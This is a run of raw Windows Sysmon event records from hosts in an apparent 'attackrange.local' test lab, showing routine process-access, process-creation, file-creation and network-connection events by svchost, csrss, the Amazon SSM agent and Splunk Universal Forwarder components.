09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A46-6151-B379-00000000FD01}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A46-6151-B379-00000000FD01}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.541{69CF5F33-8A46-6151-B379-00000000FD01}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000978303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.119{69CF5F33-8A45-6151-B279-00000000FD01}3536512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:25.860{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:27.702{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4305MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:27.083{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC90E5C5E88E823679BFC0EEBA1122F,SHA256=D9320202A9AC00B3A01F91633CEDA4EB4F2AC747A204C2ABF873DFF4CF6B8980,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A47-6151-B579-00000000FD01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8A47-6151-B579-00000000FD01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.930{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A47-6151-B579-00000000FD01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.916{69CF5F33-8A47-6151-B579-00000000FD01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:24.430{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58707-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E92394A4CB80B4E106F0DD524D2384,SHA256=DF2461D73D007B45A7744D706AA87B46EA669C9E41BDD39CE7A980EC63ACFE93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A47-6151-B479-00000000FD01}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 